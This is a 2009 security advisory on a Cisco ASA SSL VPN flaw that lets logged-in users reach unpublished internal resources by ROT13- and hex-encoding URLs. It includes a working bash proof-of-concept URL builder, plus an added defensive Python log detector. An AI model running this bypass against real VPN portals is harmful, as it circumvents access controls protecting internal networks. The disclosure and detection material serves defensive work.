Cisco ASA 8.x VPN SSL module Clientless URLlist control bypass

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-013
- Original release date: December 7th, 2009
- Last revised: December 16th, 2009
- Discovered by: David Eduardo Acosta Rodriguez
- Severity: 4/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass

II. BACKGROUND
-------------------------
Cisco VPN SSL [1] is a module for Cisco ASA and Cisco Integrated
Services Routers to extend network resources to virtually any remote
user with access to the Internet and a web browser.

III. DESCRIPTION
-------------------------
Cisco VPN SSL Clientless lets administrators define rules for the specific
targets within the private network that WebVPN users will be able to
access. These specific targets are published using links on the VPN SSL
home page. These links (URLs) are protected (obfuscated) using a ROT13
substitution [2] and converting the ASCII characters to hexadecimal. A
user with a valid account and without "URL entry" can access any
internal/external resource simply by taking a URL, applying ROT13 to it,
converting the ASCII characters to hexadecimal and appending this string
to the Cisco VPN SSL URL.

IV. PROOF OF CONCEPT
-------------------------
Using URL http://intranet published on internal server (not accessible
from home page):
1. Convert string to ROT13: uggc://vagenarg
2. Change ASCII chars to HEX: 756767633a2f2f766167656e617267
3. Append string to Cisco VPN SSL:
https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++

This is a simple PoC for easy demonstration:

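#!/bin/bash
# Builds the portal URL for a given target: ROT13 the string, then hex-encode it.
echo -n "write URL:"
read -r a
# ROT13 the letters, dump the bytes as hex, drop the od offsets and spaces,
# then join the od output lines into one string.
b=$(echo -n "$a" | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m][N-Z][A-M]' | od -tx1 | cut -c8- | sed 's/ //g' | tr -d '\n')
echo -n "URL "
echo -n "https://[CISCOVPNSSL]/+CSCO+00"; echo -n "$b"; echo -n "++";
echo "";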
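
Added example (not part of the original advisory): because the obfuscation
is only ROT13 plus hex, a defender can reverse it in request logs and flag
portal requests whose decoded target is not on the published URL list. The
log layout, user names and published list below are constructed assumptions;
the path pattern follows the PoC above.

```python
import codecs
import re
from urllib.parse import urlsplit

# Path layout taken from the advisory's PoC: /+CSCO+00<hex of ROT13(url)>++
CSCO_PATH = re.compile(r"/\+CSCO\+00((?:[0-9a-fA-F]{2})+)\+\+")

def decode_portal_path(path):
    """Return the cleartext target URL hidden in a portal path, or None."""
    m = CSCO_PATH.search(path)
    if not m:
        return None
    try:
        rot13 = bytes.fromhex(m.group(1)).decode("ascii")
    except UnicodeDecodeError:
        return None  # not ASCII, so not the encoding the advisory describes
    return codecs.decode(rot13, "rot_13")

def origin(url):
    """Scheme, host and port, so prefix tricks in the host name do not match."""
    p = urlsplit(url)
    return (p.scheme.lower(), (p.hostname or "").lower(), p.port)

def unpublished_requests(log_lines, published):
    """Return (user, url) pairs whose decoded target is not a published origin."""
    allowed = {origin(u) for u in published}
    hits = []
    for line in log_lines:
        user, _, rest = line.partition(" ")
        url = decode_portal_path(rest)
        if url is not None and origin(url) not in allowed:
            hits.append((user, url))
    return hits

# Constructed sample data (hypothetical users, hosts and log layout).
PUBLISHED = ["http://wiki"]
SAMPLE_LOG = [
    "alice GET /+CSCO+00756767633a2f2f6a767876++",          # http://wiki
    "bob GET /+CSCO+00756767633a2f2f766167656e617267++",    # http://intranet
    "carol GET /index.html",                                # not a portal link
]

if __name__ == "__main__":
    for user, url in unpublished_requests(SAMPLE_LOG, PUBLISHED):
        print(f"unpublished target: user={user} url={url}")
```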

V. BUSINESS IMPACT
-------------------------
Users with a valid account can surf to internal/external resources,
bypassing the controls on the home page.

VI. SYSTEMS AFFECTED
-------------------------
Cisco ASA <= 8.x are vulnerable.

VII. SOLUTION
-------------------------
Always set a "webtype" ACL and "filter" to block access in Web VPN SSL
(not activated by default). This is now included on the Cisco site.
Follow the recommendations from "Cisco Understanding Features Not
Supported in Clientless SSL VPN" [3].

VIII. REFERENCES
-------------------------
[1] www.cisco.com/web/go/sslvpn
[2] http://en.wikipedia.org/wiki/ROT13
[3] http://www.cisco.com/en/US/docs/security/asa/asa82/configuration/guide/webvpn.html#wp999589
http://tools.cisco.com/security/center/viewAlert.x?alertId=19609
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by
David Eduardo Acosta Rodríguez (deacosta (at) isecauditors (dot) com,
                                dacosta (at) computer (dot) org).
Thanks to Juan Galiana Lara (jgaliana (at) isecauditors (dot) com)
for additional research.

X. REVISION HISTORY
-------------------------
December 7, 2009: Initial release.
December 16, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
December 9, 2009: Vendor contacted
December 9, 2009: Vendor response, they include our mitigation
                  proposal in their website and start the analysis
                  of correction required.
December 16, 2009: Vendor confirms remediation and public statement.
December 17, 2009: Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

David Eduardo Acosta Rodriguez                                                       12/17/2009

				